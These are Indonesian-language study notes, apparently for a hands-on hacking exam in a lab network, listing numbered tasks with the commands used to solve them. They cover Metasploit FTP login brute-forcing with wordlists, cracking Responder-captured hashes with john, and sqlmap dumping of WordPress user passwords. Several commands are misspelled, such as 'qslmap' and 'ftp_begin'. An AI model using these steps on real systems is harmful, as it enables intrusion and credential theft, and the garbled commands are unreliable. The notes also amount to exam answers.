1. soal pertama: bersifat cerita, "Pada direktori dokumen terdapat beberapa Gambar,
temukan Nomor Yang dapat ditemukan pada salah satu Gambar yang tersedia di
direktori dokumen itu
(ini direktorinya ada di Windows server Kita sendiri)
2. didalam salah satu server ada layana FTP. Retas kelayanan itu dan ambil datanya,
tulis datanya.
#msfconsole
msf4>use auxaliary/scanner/ftp/ftp_begin
msf4> set RHOSTS 10.10.10.16
msf4> set USER_FILE /root/Desktop/Wordlist/Username.txt
msf4> set PASS_FILE /root/Desktop/Wordlist/Password.txt
msf4> set VERBOSE false
msf4>run
ftp 10.10.10.16
ftp>dir
nama_file.txt
ftp> get nama_file.txt
ftp>bye
cat isinya...
3. ada salah satu server menggunakan apache, maka carilah versi apache yang
digunakan oleh server itu
cari dari seluruh hasil nmap -sV yang ada port 80 dan menggunakan apache.
4.ada salah satuserver yang membuka salah satu remote service, beritahukan berapa
ip server ip itu dan windows apa (ingat selain server anda)
#rdesktop 10.10.10.12
jika nilai hashnya tidak ada----> maka itulah jawaban yang tercompromise/
dimodifikasi oleh attacker.
7. pada salah satu server ada layanan SNMP yang aktif, carilah berapa IP servernya.
#nbtscan 10.10.10.0/24
10.10.10.12 ---> ip kita
10.10.10.11
10.10.10.13
8. pada suatu kesempatan, suatu konsultan berhasil mengambil hash dari target
dengan menggunakan responder, carilah plaintext password dari log responder
(hint: nama filenya adalah abc.txt)
letak
#cd/usr/share/responder
#ls
#cd logs
#john abc.txt
9. ada suatu file pcapnp di direktori document yang berisikan komunikasi korban ke
web, didalamnya ada pass untuk login, carilah passwordnya untuk login
10. ada suatu aplikasi (katakanlah pada HEG.com) yang menggunakan wordpress yang
telah diretas oleh seseorang, kemudian didapati ada akun bernama John yang passnya
di ganti, tugas anda sekarang adalah mencari tahu apa nilai password john yang baru
kemudian, ada salah satu IP yang ketika port 80 diakses, maka dia akan mengarhkan
kita ke halaman WAMP.
10.10.10.90
http://10.10.10.90/ --->WAMP
http://10.10.10.90/HEC
http://10.10.10.90/DVWA
http://10.10.10.90microsoft
katakanlah nanti ada sekitar 6 database, maka lupakanlah database DVWA dan cari
database yang namanya tidak jauh dari aplikasi wordpress yang dipakai HEC.com
emunerasi table:
#qslmap -r nama direktori_yang dibuat -D nama_database --tables
#qslmap -r nama direktori_yang dibuat -D nama_database -T wp_users --columns
enumerasi field/data
#qslmap -r nama direktori_yang dibuat -D nama_database -T wp_users -C
usename,password,email --dump
12. beritahukan apa nama aplikasi yang digunakan oleh layanan FTP.
13. ada suatu aplikasi (katakanlah good shopping) yang terdeteksi rentan didalamnya
terdapat beberapa nama user, maka carilah siapa nama user pemilik id 11.
database shopping
emunerasi tabel user
enumerasi kolom ID, username,nama depan, nama belakang
lalu lihat siapa pemilik nomor 11.